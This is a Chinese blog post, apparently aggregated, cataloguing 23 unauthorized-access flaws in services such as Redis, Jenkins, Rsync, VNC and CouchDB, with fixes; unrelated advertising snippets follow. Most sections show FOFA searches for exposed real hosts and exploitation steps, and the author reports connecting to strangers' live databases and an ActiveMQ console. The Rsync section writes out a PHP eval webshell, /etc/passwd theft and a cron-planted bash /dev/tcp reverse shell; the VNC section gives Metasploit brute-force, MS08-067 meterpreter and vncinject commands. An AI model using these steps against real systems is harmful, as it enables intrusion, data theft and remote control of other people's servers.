网站备案变更主体电话住房城乡建设管理网站

张小明 2025/12/29 0:03:46
网站备案变更主体电话,住房城乡建设管理网站,珠宝首饰网站建设策划书,网站界面布局一. Redis Redis 默认情况下#xff0c;会绑定在 0.0.0.0:6379 #xff0c;如果没有进⾏采⽤相关的策略#xff0c;⽐如添加防 ⽕墙规则避免其他⾮信任来源 ip 访问等#xff0c;这样将会将 Redis 服务暴露到公⽹上#xff0c;如果在没有设 置密码认证#xff08;⼀般为空…一. RedisRedis 默认情况下会绑定在 0.0.0.0:6379 如果没有进⾏采⽤相关的策略⽐如添加防 ⽕墙规则避免其他⾮信任来源 ip 访问等这样将会将 Redis 服务暴露到公⽹上如果在没有设 置密码认证⼀般为空的情况下会导致任意⽤户在可以访问⽬标服务器的情况下未授权Redis 以及读取 Redis 的数据。攻击者在未授权访问 Redis 的情况下利⽤ Redis ⾃身的提供的config 命令,可以进⾏写⽂件操作攻击者可以成功将⾃⼰的ssh公钥写⼊⽬标服务器的 /root/.ssh ⽂件夹的authotrized\_keys ⽂件中进⽽可以使⽤对应私钥直接使⽤ssh服务 登录⽬标服务器。漏洞复现首先我们需要用docker启动一个靶机命令如下进⼊⽬录cd /vulhub-master/redis/4-unacc 启动docker-compose up -d 检查docker-compose ps然后在kali上面安装redis程序命令为#安装redis apt-get install redis #redis链接 redis-cli -h x.x.x.x -p 6379连接后会弹出以下语言直接连接上了不需要认证就说明存在未授权访问漏洞接着我们下载redis-rogue-server.py来获取shell下载连接https://github.com/n0b0dyCN/redis-rogue-server下载后使用python3启动然后就可以获取shell了执行命令如下python3 redis-rogue-server.py --rhost x.x.x.x --lhost x.x.x.x二.MongoDB开启MongoDB服务时不添加任何参数时,默认是没有权限验证的,登录的⽤户可以通过默认端⼝⽆需密码对数据库任意操作增、删、改、查⾼危动作⽽且可以远程访问数据库。漏洞复现首先去fofa搜索端口为27017的ip然后直接用navicat去尝试连接即可首先打开navicat点击连接选择MongoDB这里的主机填写我们查到的ip连接名随便填写然后测试连接这里我直接找到了一个可以连接的如何修复1. 为MongoDB添加认证MongoDB启动时添加 --auth 参数、为MongoDB添加⽤户。2. MongoDB ⾃身带有⼀个HTTP服务和并⽀持REST接⼝。在2.6以后这些接⼝默认是关闭 的。mongoDB默认会使⽤默认端⼝监听web服务⼀般不需要通过web⽅式进⾏远程管 理建议禁⽤。修改配置⽂件或在启动的时候选择 –nohttpinterface 参数 nohttpinterfacefalse 。3. 启动时加⼊参数 --bind_ip 127.0.0.1 或在 /etc/mongodb.conf ⽂件中添加以下内容bind_ip 127.0.0.1 。三.MemcachedMemcached 是⼀套常⽤的 key-value 分布式⾼速缓存系统由于 Memcached 的安全设计缺陷没有权限控制模块所以对公⽹开放的Memcache服务很容易被攻击者扫描发现攻击者⽆需认证通过命令交互可直接读取 Memcached中的敏感信息。漏洞复现首先我们需要下载Memcached程序下载链接如下https://www.runoob.com/memcached/window-install-memcached.html下载后我们利用如下命令安装并启动Memcached漏洞程序memcached.exe -d install memcached.exe -d start然后用telnet去连接有memcached的11211 端口这里我们去fofa中搜索端口为11211的ip然后尝试连接出现如下字样就是连接成功了然后可以使用命令stats //查看memcache服务状态 stats items //查看所有items stats cachedump 39 0 //获得缓存key get :state:264861539228401373:261588 //通过key读取相应value获得实际缓存内容造 成敏感信息泄露接下来我们使⽤Nmap程序的脚本进⾏漏洞扫描,发现也可以扫出来nmap -p 11211 --script memcached-info x.x.x.x如何修复1. 设置Memchached只允许本地访问。2. 禁⽌外⽹访问Memcached 11211端⼝。3. 配置访问控制策略。4. 最⼩化权限运⾏。5. 修改默认端⼝等。四.Jenkins默认情况下 Jenkins⾯板中⽤户可以选择执⾏脚本界⾯来操作⼀些系统层命令攻击者可通过未授权访问漏洞或者暴⼒破解⽤户密码等进⼊后台管理服务通过脚本执⾏界⾯从⽽获取服务器权限。漏洞复现首先我们利用如下语句在fofa中搜索port8080 appJENKINS titleDashboard [Jenkins]找到一个页面中有Manage Jenkins的往下滑会有一个Scritp Console点开之后我们就可以在里面执行命令了这里我们执行一个println “whoami” .execute().text发现成功执行如何修复1. 升级版本。2. 添加认证设置强密码复杂度及账号锁定。3. 禁⽌把Jenkins直接暴露在公⽹。五.Jupyter NoteBookJupyter Notebook此前被称为 IPython notebook是⼀个交互式笔记本⽀持运⾏ 40多种编程语⾔。如果管理员未为Jupyter Notebook配置密码将导致未授权访问漏洞游客可在其中创建⼀个console并执⾏任意Python代码和命令默认端⼝8888。漏洞复现同样的我们在fofa中搜索Jupyter Notebook port“8888”如果存在未授权访问漏洞那么点进去会直接跳转到web页面否则就会到一个登陆页面登陆页面web页面在web页面我们可以直接创建一个终端来执行命令点击new里的terminal即可然后在这里可以直接执行命令如何修复1. 开启身份验证防⽌未经授权⽤户访问。2. 访问控制策略限制IP访问绑定固定IP。六.ElasticsearchElasticSearch是⼀个基于Lucene的搜索服务器。它提供了⼀个分布式多⽤户能⼒的全⽂搜索引擎基于RESTful web接⼝。Elasticsearch是⽤Java开发的并作为Apache许可条款下的开放源码发布是当前流⾏的企业级搜索引擎。Elasticsearch的增删改查操作全部由http接⼝完成。由于Elasticsearch授权模块需要付费所以免费开源的Elasticsearch可能存在未授权访问漏洞。该漏洞导致攻击者可以拥有Elasticsearch的所有权限。可以对数据进⾏任意操作。业务系统将⾯临敏感数据泄露、数据丢失、数据遭到破坏甚⾄遭到攻击者的勒索。复现步骤首先我们利用如下语法在fofa中进行搜索Elasticsearch port9200然后寻找能直接点进去查看到信息的ip含有未授权访问漏洞则会出现如下页面可以按照上面的查看节点信息如访问ip的/_nodes 目录如何修复1. 访问控制策略限制IP访问绑定固定IP。2. 在 config/elasticsearch.yml 中为9200端⼝设置认证等七.KibanaKibana是⼀个开源的分析与可视化平台设计出来⽤于和Elasticsearch⼀起使⽤的。你可以⽤kibana搜索、查看存放在Elasticsearch中的数据。Kibana与Elasticsearch的交互⽅式是以各种不同的图表、表格、地图等直观地展示数据从⽽达到⾼级的数据分析与可视化的⽬的。 Elasticsearch、Logstash和Kibana这三个技术就是我们常说的ELK技术栈可以说这三个技术的组合是⼤数据领域中⼀个很巧妙的设计。⼀种很典型的MVC思想模型持久层视图层和控制层。Logstash担任控制层的⻆⾊负责搜集和过滤数据。Elasticsearch担任数据持久层的⻆⾊负责储存数据。⽽我们这章的主题Kibana担任视图层⻆⾊拥有各种维度的查询和分析并使⽤图形化的界⾯展示存放在Elasticsearch中的数据。漏洞复现我们利用如下语法在fofa中进行搜索kibana port5601如果该网站存在未授权访问漏洞则不会出现登陆界面而是直接进入网站界面那么我们就可以通过拼接路径HTTP://{IP}/app/kibana#/进入网站内部查看信息如何修复1. 升级Kibana到最新版本,升级地址如下https://www.elastic.co/cn/downloads/kibana。2. 在kibana所在的服务器上安装nginx服务利⽤nginx的转发指令实现需要输⼊账号密码才可以访问⻚⾯。3. 如果正常业务中 kibana 服务需要被其他服务器来访问可以通过 iptables 策略仅允许指定的 IP来访问服务。八.Docker Remote APIDocker是⼀个开源的应⽤容器引擎让开发者可以打包他们的应⽤以及依赖包到⼀个可移植的容器中然后发布到任何流⾏的LINUX机器上也可以实现虚拟化。 Docker swarm 是⼀个将docker集群变成单⼀虚拟的docker host⼯具使⽤标准DockerAPI能够⽅便docker集群的管理和扩展由docker官⽅提供。 Docker Remote API如配置不当可导致未授权访问被攻击者恶意利⽤。攻击者⽆需认证即可访问到Docker数据可能导致敏感信息泄露⿊客也可以删除 Docker上的数据,直接访问宿主机上的敏感信息或对敏感⽂件进⾏修改最终完全控制服务器。漏洞复现我们利用如下语法在fofa中进行搜索port2375九.Kubernetes Api ServerKubernetes 的服务在正常启动后会开启两个端⼝Localhost Port 默认8080、Secure Port 默认6443。这两个端⼝都是提供 Api Server 服务的⼀个可以直接通过Web 访问另⼀个可以通过 kubectl 客户端进⾏调⽤。如果运维⼈员没有合理的配置验证和权限那么攻击者就可以通过这两个接⼝去获取容器的权限。漏洞复现我们在fofa中利用如下语法进行搜索port8080 appKubernetes点进去即可得到类似如下页面这就证明这个网站有未授权访问漏洞如何修复1. 进⾏授权认证2. 使⽤Service Account令牌3. 置防⽕墙策略十.HadoopHadoop是⼀个由Apache基⾦会所开发的分布式系统基础架构由于服务器直接在开放了Hadoop 机器 HDFS 的 50070 web 端⼝及部分默认服务端⼝⿊客可以通过命令⾏操作多个⽬录下的数据如进⾏删除下载⽬录浏览甚⾄命令执⾏等操作产⽣极⼤的危害。漏洞复现我们在fofa中搜索如下port8088 appHadoop如果出现如下页面则存在未授权访问漏洞修复方法1. 如⽆必要关闭 Hadoop Web 管理⻚⾯。2. 开启身份验证防⽌未经授权⽤户访问。3. 设置“安全组”访问控制策略将 Hadoop 默认开放的多个端⼝对公⽹全部禁⽌或限制可信任的 IP地址才能访问包括 50070 以及 WebUI 等相关端⼝。十一.ActiveMQActiveMQ是⼀款流⾏的开源消息服务器。默认情况下ActiveMQ服务是没有配置安全参数。恶意⼈员可以利⽤默认配置弱点发动远程命令执⾏攻击获取服务器权限从⽽导致数据泄露。漏洞复现我们利用如下语法在fofa中进行搜索bodyActiveMQ port8161在如下页面中点击Manage ActiveMQ broker后会进入一个登陆页面或者弹出一个登录框我们尝试输入弱口令密码如果可以登陆进去则该页面存在未授权访问漏洞我找的这个网站就存在未授权访问漏洞点击进去后会谈到一个炫酷的登陆页面直接输入admin-admin就成功登陆进去漏洞修复1. ActiveMQ的安全配置分为控制台安全配置和后台安全配置。控制台安全配置是指⽤户通过浏览器登录ActiveMQ管理界⾯对ActiveMQ进⾏管理的⼀个安全配置主要是添加⽤户和密码。后台安全配置是指程序通过ActiveMQ发送消息的⼀个安全配置。2. ActiveMQ后台安全配置。配置置连接ActiveMQ的⽤户名和密码如果不设置ActiveMQ安全机制任何知道ActiveMQ服务的IP、端⼝和消息地址的⼈都可以接受和发送消息。十二.RabbitMQ未授权访问漏洞RabbitMQ是⽬前⾮常热⻔的⼀款消息中间件基于AMQP协议的可以在发布者和使⽤者之间交换异步消息。消息可以是⼈类可读的JSON简单字符串或可以转换为JSON字符串的值列表。漏洞复现我们在fofa中搜索如下端口port15672 port15692 port25672然后回出现一个登录界面这里的默认账号和密码都是guest 直接尝试登陆如果成功登录进入如下页面则该网站存在未授权访问漏洞漏洞修复1. 修改为强密码删除默认的账号guest。2. 禁⽌对外⽹开放仅限于内部访问。十三.Springboot ActuatorActuator 是 springboot 提供的⽤来对应⽤系统进⾏⾃省和监控的功能模块借助于 Actuator 开发者可以很⽅便地对应⽤系统某些监控指标进⾏查看、统计等。在 Actuator 启⽤的情况下如果没有做好相关权限控制⾮法⽤户可通过访问默认的执⾏器端点endpoints来获取应⽤系统中的监控信息从⽽导致信息泄露甚⾄服务器被接管的事件发⽣。漏洞复现在fofa中搜索如下语句icon_hash116323821当 web 应⽤程序出现 4xx、5xx 错误时显示类似以下⻚⾯就能确定当前 web 应⽤是使⽤了springboot 框架出现如下界面时则说明该页面存在未授权访问漏洞我们可以在ip后面拼接/teace或者/env等目录以查看信息访问/trace端点获取基本的 HTTP 请求跟踪信息时间戳、HTTP 头等如果存在登录⽤户的操作请求可以伪造cookie进⾏登录。访问/env端点获取全部环境属性由于 actuator 会监控站点 mysql、mangodb 之类的数据库服务所以通过监控信息有时可以mysql、mangodb 数据库信息如果数据库正好开放在公⽹那么造成的危害是巨⼤的。git 项⽬地址泄露这个⼀般是在/health 路径⽐如如下站点访问其 health 路径可探测到站点 git 项⽬地址。修复方法1. 禁⽤/env接⼝。2. 升级到Springboot actuator 2.0。3. 禁⽌对外开放。十四.FTP未授权访问漏洞(匿名登陆)FTP 弱⼝令或匿名登录漏洞⼀般指使⽤ FTP 的⽤户启⽤了匿名登录功能或系统⼝令的⻓度太短、复杂度不够、仅包含数字、或仅包含字⺟等容易被⿊客攻击发⽣恶意⽂件上传或更严重的⼊侵⾏为。漏洞复现首先我们要打开iis服务我这里使用的server2012虚拟机开启添加功能时要选择上ftp然后在网站这里点击添加FTP站点站点名称随便填写物理路径选择一个有东西的文件夹然后点击下一步在这里选择一个物理机可以访问到的ip选择无ssl后点击下一步这里选择匿名和匿名用户并且给了读取与写入的权限点击完成在物理机中的资源管理器中利用访问ftp://192.168.159.128:21/就可以获取到该ftp站点下的所有文件了漏洞修复禁⽌匿名登录十五.JBossJBoss是⼀个基于J2EE的开放源代码应⽤服务器代码遵循LGPL许可可以在任何商业应⽤中免费使⽤JBoss也是⼀个管理EJB的容器和服务器⽀持EJB 1.1、EJB 2.0和EJB3规范。,默认情况下访问 http://ip:8080/jmx-console 就可以浏览 JBoss 的部署管理的信息不需要输⼊⽤户名和密码可以直接部署上传⽊⻢有安全隐患。漏洞复现我们在fofa中搜索如下语句titleWelcome to JBoss点击进入页面后再点击页面中的JMX Console链接如果能直接进入控制页面而不会显示404或者登陆界面的话就证明这个网站存在未授权访问漏洞出现如下界面则存在未授权访问漏洞然后我们还可以通过jboss.deployment部署shell修复方法1. jboss.deployment部署shell2. 进⾏JMX Console 安全配置。十六.LdapLDAP中⽂全称为轻型⽬录访问协议Lightweight Directory Access Protocol默认使⽤ 389 LDAP 底层⼀般使⽤ TCP 或 UDP 作为传输协议。⽬录服务是⼀个特殊的数据库是⼀种以树状结构的⽬录数据库为基础。 未对LDAP的访问进⾏密码验证导致未授权访问。漏洞复现首先我们需要下载一个ldapadmin软件链接https://sourceforge.net/projects/ldapadmin/下载完成后在fofa中进行搜索端口为389的ip然后打开刚刚下载的ldapadmin软件点击左上角的连接然后点击new connection将搜索到的IP地址填入框中然后勾选下面的Anonymous connection匿名访问后点击Test connection测试连接当出现连接成功时则证明该网页存在ldap未授权访问漏洞然后就可以连接⽬标LDAP服务并查看其内容如何修复1. 修改ldap的acl不允许匿名访问。2. 根据业务设置ldap访问⽩名单或⿊名单。十七.RsyncRsync 是Linux/Unix下的⼀个远程数据同步⼯具可通过LAN/WAN快速同步多台主机间的⽂件 和⽬录默认运⾏在873端⼝。由于配置不当导致任何⼈可未授权访问rsync上传本地⽂件下载服务器⽂件。 Rsync 默认允许匿名访问如果在配置⽂件中没有相关的⽤户认证以及⽂件授权就会触发隐患。Rsync 的默认端⼝为 837 且默认配置⽂件路径在/etc/rsync.conf漏洞复现我们在fofa中搜索语法如下(port873) (is_honeypotfalse is_fraudfalse)然后自己开启一个vulhub靶机命令如下cd vulhub/rsync/common docker-compose up -d然后到kali中利用如下语句去连接并读取文件rsync rsync://192.168.124.153:873/ rsync rsync://192.168.124.153:873/src/证明其有未授权访问漏洞后就可以对其敏感文件内容进行下载利用如下命令rsync rsync://IP:port/src/etc/passwd ⽬标路径如果靶机内有相应的asp/php/jsp环境的话还可以写入一个一句话木马对其进行控制命令如下先自己写一个一句话木马echo “?php eval($\_POST\[cmd\]); ?” shell.php然后将其放到靶机的home目录下rsync ./phpinfo.php rsync://IP:873/src/home/执行完成后查看是否上传成功发现home中成功出现一个shell.php文件反弹shell在此可利⽤定时任务cron来反弹获取shell首先利用如下命令查看靶机中的定时任务并将其下载rsync rsync://IP:873/src/etc/crontab //查看 rsync rsync://ip/src/etc/crontab /tmp/tmp/crontab.txt //下载定时任务内容为⼤致意思为每17分钟调⽤⼀次**/etc/cron.hourly,然后创建一个shell文件并对其授权**#!/bin/bash /bin/bash -i /dev/tcp/10.10.10.128/4444 01 chmod 777 shell上传到靶机上然后开启监听端口4444等待即可反弹获取shellrsync -av /tmp/tmp/shell rsync://192.168.124.153:873/src/etc/ cron.hourly nc -lvp 4444修复方法配置认证⽤户名或者密码 host allow/deny 来控制接⼊源IP uid和gid,使⽤⾜够但最⼩权限的账号进⾏ 必要时候可以配置只读 ⾮必要应该仅限制配置路径下可访问1.修改指定端⼝- 配置⽂件不存在修改指定端⼝的选项可以在启动命令⾏通过参数指定/usr/local/rsync/bin.rsync --port878 --daemon- 查看进程检测是否更改端⼝ ps -ef | grep rsync2.禁⽌匿名访问- 配置⽂件/etc/rsync.conf中增加 auth users test- 若未包含auth users即为匿名访问十八.VNCVNC 是虚拟⽹络控制台 Virtual Network Console 的英⽂缩写。它是⼀款优秀的远程控制⼯具软件由美国电话电报公司ATT的欧洲研究实验室开发。VNC是基于 UNXI 和 Linux 的免费开源软件由 VNC Server 和 VNC Viewer 两部分组成。VNC 默认端⼝号为 5900、5901。VNC 未授权访问漏洞如被利⽤可能造成恶意⽤户直接控制target主机。漏洞复现我们在fofa中搜索语法如下(port5900) (is_honeypotfalse is_fraudfalse)然后在kali中利用MSF中的auxiliary/scanner/vnc/vnc_none_auth 模块对搜索到的ip进行漏洞检索与利用输入msfconsole进入msf控制台后输入use auxiliary/scanner/vnc/vnc_none_auth 进入攻击模块再输入set rhosts IP-254 设置线程threads为100后输入run运行即可判断该ip是否存在未授权访问漏洞以下是几个攻击利用该漏洞的方法# VNC未授权检测 msf6 use auxiliary/scanner/vnc/vnc_none_auth msf6 auxiliary(scanner/vnc/vnc_none_auth) show options msf6 auxiliary(scanner/vnc/vnc_none_auth) set rhosts IP-254 msf6 auxiliary(scanner/vnc/vnc_none_auth) set threads 100 msf6 auxiliary(scanner/vnc/vnc_none_auth) run # VNC密码爆破 msf6 use auxiliary/scanner/vnc/vnc_login msf6 auxiliary(scanner/vnc/vnc_login) IP msf6 auxiliary(scanner/vnc/vnc_login) set rhosts IP msf6 auxiliary(scanner/vnc/vnc_login) set blank_passwords true //弱密码爆 破 msf6 auxiliary(scanner/vnc/vnc_login) run # 加载攻击模块 msf6 exploit(windows/smb/ms08_067_netapi) use exploit/windows/smb/ms08_0 67_netapi msf6 exploit(windows/smb/ms08_067_netapi) set payload windows/meterprete r/reverse_tcp msf6 exploit(windows/smb/ms08_067_netapi) set rhosts IP msf6 exploit(windows/smb/ms08_067_netapi) set lhost IP msf6 exploit(windows/smb/ms08_067_netapi) set target 34 msf6 exploit(windows/smb/ms08_067_netapi) exploit 获取会话后直接run vnc可控制远程虚拟机 # 直接控制远程机器 msf6 use exploit/multi/handler msf6 exploit(multi/handler) set payload windows/vncinject/reverse_tcp msf6 exploit(multi/handler) set lhost IP msf6 exploit(multi/handler) set lport 4466 msf6 exploit(multi/handler) exploit最后可以利用vncviewer ip去连接如果成功连接则可以远程连接到目标计算机如何修复1. 配置 VNC 客户端登录⼝令认证并配置符合密码强度要求的密码。2. 以最⼩普通权限身份运⾏操作系统。修复方法十九.DubboDubbo是阿⾥巴巴公司开源的⼀个⾼性能优秀的 服务框架使得应⽤可通过⾼性能的 RPC实现服务的输 出和输⼊功能可以和 Spring框架⽆缝集成。dubbo 因配置不当导致未授权访问漏洞。漏洞复现我们使用以下语句在fofa中进行搜索(appAPACHE-dubbo) (is_honeypotfalse is_fraudfalse)将搜到的ip到kali中利用telnet进行链接测试出现如下语句则代表连接成功存在dubbo未授权访问漏洞如何防御1. 配置dubbo认证。2. 设置防⽕墙策略如果正常业务中dubbo 服务需要被其他服务器来访问可以通过 iptables 策略仅允许指定的 IP 来访问服务。二十.ZookeeperZookeeper是分布式协同管理⼯具常⽤来管理系统配置信息提供分布式协同服务。Zookeeper的默认开放端⼝是 2181 。Zookeeper安装部署之后默认情况下不需要任何身份验证造成攻击者可以远程利⽤Zookeeper通过服务器收集敏感信息或者在Zookeeper集群内进⾏破坏⽐如kill命令。攻击者能够执⾏所有只允许由管理员运⾏的命令。漏洞复现首先在fofa中搜索端口为2181的ip然后在kali中利用如下语句进行未授权访问漏洞测试echo envi | nc IP 2181如果该网站存在未授权访问漏洞则会出现如下语句在确定存在zookeeper未授权访问漏洞后可使⽤Zookeeper可视化管理⼯具进⾏连接下载链接https://issues.apache.org/jira/secure/attachment/12436620/ZooInspector.zip在第一个框中填入ip修复方法1. 修改 ZooKeeper 默认端⼝采⽤其他端⼝服务。2. 添加访问控制配置服务来源地址限制策略。3. 增加 ZooKeeper 的认证配置。二十一.NSFNetwork File System(NFS)是由SUN公司研制的UNIX表示层协议(pressentation layer protocol)能使使⽤者访问⽹络上别处的⽂件就像在使⽤⾃⼰的计算机⼀样。服务器在启⽤nfs服务以后由于nfs服务未限制对外访问导致共享⽬录泄漏。漏洞复现首先我们在fofa中搜索nfs然后到kali中安装一个nfs服务安装命令apt install nfs-common然后查看nfs服务器上的共享⽬录语句如下showmount -e IP查到目录然后挂载相应共享目录到本地mount -t nfs IP:/grdata /mnt卸载目录umount /mnt如何修复1.利⽤iptables限制端⼝2049和20048端⼝的访问禁⽌外部访问2.设置/etc/exports对访问进⾏控制二十二.Druid当开发者配置不当时就可能造成未授权访问漏洞复现在fofa中利用如下语句进行搜索titleDruid Stat Index访问之后直接进入网站页面则存在druid未授权访问漏洞修复方法1. 配置访问账号密码。2. 禁⽌对外⽹开放访问。二十三.CouchDBApache CouchDB是⼀个开源数据库专注于易⽤性和成为完全拥抱web的数据库 。它是⼀个使⽤JSON作为存储格式JavaScript作为查询语⾔MapReduce和HTTP作为API的NoSQL数据库。应⽤⼴泛如BBC⽤在其动态内容展示平台Credit Suisse⽤在其内部的商品部⻔的市场框架Meebo⽤在其社交平台web和应⽤程序。 在2017年11⽉15⽇CVE-2017-12635和CVE-2017-12636披露CVE-2017-12636是⼀个任意命令执⾏漏洞我们可以通过config api修改couchdb的配置query\_server这个配置项在设计、执⾏view的时候将被运⾏。默认端⼝是6984漏洞复现我们在fofa中搜索如下语法或者直接利用docker搭建一个环境(port5984) (is_honeypotfalse is_fraudfalse) cd /vulhub/couchdb/CVE-2017-12636 docker-compose up -d然后利用curl执⾏未授权访问测试命令curl IP:5984/_config如果目标存在couchdb未授权访问漏洞则会出现如下如何修复1.指定CouchDB绑定的IP 需要重启CouchDB才能⽣效在 /etc/couchdb/local.ini ⽂件中找到 “bind_address 0.0.0.0” 把 0.0.0.0 修改为 127.0.0.1 然后保存。 注修改后只有本机才能访问CouchDB。2.设置访问密码需要重启CouchDB才能⽣效在 /etc/couchdb/local.ini 中找到“[admins]”字段配置密码。3.设置WWW-Authenticate强制认证。网络安全学习资源分享:给大家分享一份全套的网络安全学习资料给那些想学习 网络安全的小伙伴们一点帮助对于从来没有接触过网络安全的同学我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线大家跟着这个大的方向学习准没问题。因篇幅有限仅展示部分资料朋友们如果有需要全套《网络安全入门进阶学习资源包》需要点击下方链接即可前往获取读者福利 |CSDN大礼包《网络安全入门进阶学习资源包》免费分享安全链接放心点击1.成长路线图学习规划要学习一门新的技术作为新手一定要先学习成长路线图方向不对努力白费。对于从来没有接触过网络安全的同学我们帮你准备了详细的学习成长路线图学习规划。可以说是最科学最系统的学习路线大家跟着这个大的方向学习准没问题。2.网安入门到进阶视频教程很多朋友都不喜欢晦涩的文字我也为大家准备了视频教程其中一共有21个章节每个章节都是当前板块的精华浓缩。全套教程文末领取哈3.SRC黑客文档大家最喜欢也是最关心的SRC技术文籍黑客技术也有收录SRC技术文籍黑客资料由于是敏感资源这里不能直接展示哦全套教程文末领取哈4.护网行动资料其中关于HW护网行动也准备了对应的资料这些内容可相当于比赛的金手指5.黑客必读书单6.网络安全岗面试题合集当你自学到这里你就要开始思考找工作的事情了而工作绕不开的就是真题和面试题。所有资料共282G朋友们如果有需要全套《网络安全入门进阶学习资源包》可以扫描下方二维码或链接免费领取~读者福利 |CSDN大礼包《网络安全入门进阶学习资源包》免费分享安全链接放心点击
版权声明:本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!

青岛网站推广招商品牌推广策略包括哪些内容

岗位缺口都达327W了,还犹豫个啥。。。赶紧转行啊。。。。傻子才不转呢! 话是这么说,但天上不会掉馅饼,网络安全为啥这么缺人?内幕可能比你想得更野。笔者在安全圈浸淫5年,亲历过黑产大战、漏洞拍卖&#xf…

张小明 2025/12/27 5:42:57 网站建设

设计logo网站免3d效果图软件

红色警报拉响,OpenAI是真急了:30天,GPT-5.2系列紧接着GPT-5.1而来,这次还专门强化了打工能力。红色警报拉响,OpenAI是真急了:30天,GPT-5.2系列紧接着GPT-5.1而来,这次还专门强化了打…

张小明 2025/12/27 5:42:59 网站建设

开发网站的目标个人网站建设与维护

深夜的办公室,一场关于“雷同”的危机: 凌晨两点,李工揉了揉酸痛的脖子,电脑屏幕上显示着投标文件的比对结果。作为某建筑公司投标部负责人,他刚刚经历了一场“噩梦”——两份标书的施工平面布置图比例尺不同&#xf…

张小明 2025/12/27 5:42:59 网站建设

百度做网站不给FTP密码杭州专业制作网站

快速体验 打开 InsCode(快马)平台 https://www.inscode.net输入框内输入如下内容: 设计一个高效的驱动冲突自动化处理系统,要求:1. 在30秒内完成系统扫描;2. 自动识别最常见的10种驱动冲突模式;3. 提供一键修复功能&a…

张小明 2025/12/27 5:42:58 网站建设

网站建设元瑞安网

TranslucentTB启动故障修复指南:快速解决任务栏透明工具无法运行问题 【免费下载链接】TranslucentTB 项目地址: https://gitcode.com/gh_mirrors/tra/TranslucentTB TranslucentTB是一款广受欢迎的Windows任务栏透明化工具,让您的桌面更加美观时…

张小明 2025/12/27 5:42:58 网站建设

dede手机网站开发永久免费补单系统

MCP服务器故障排查实战指南:从紧急响应到系统加固 【免费下载链接】servers Model Context Protocol Servers 项目地址: https://gitcode.com/GitHub_Trending/se/servers 在Model Context Protocol (MCP) 服务的日常运维中,您可能遇到服务器启动…

张小明 2025/12/27 5:43:01 网站建设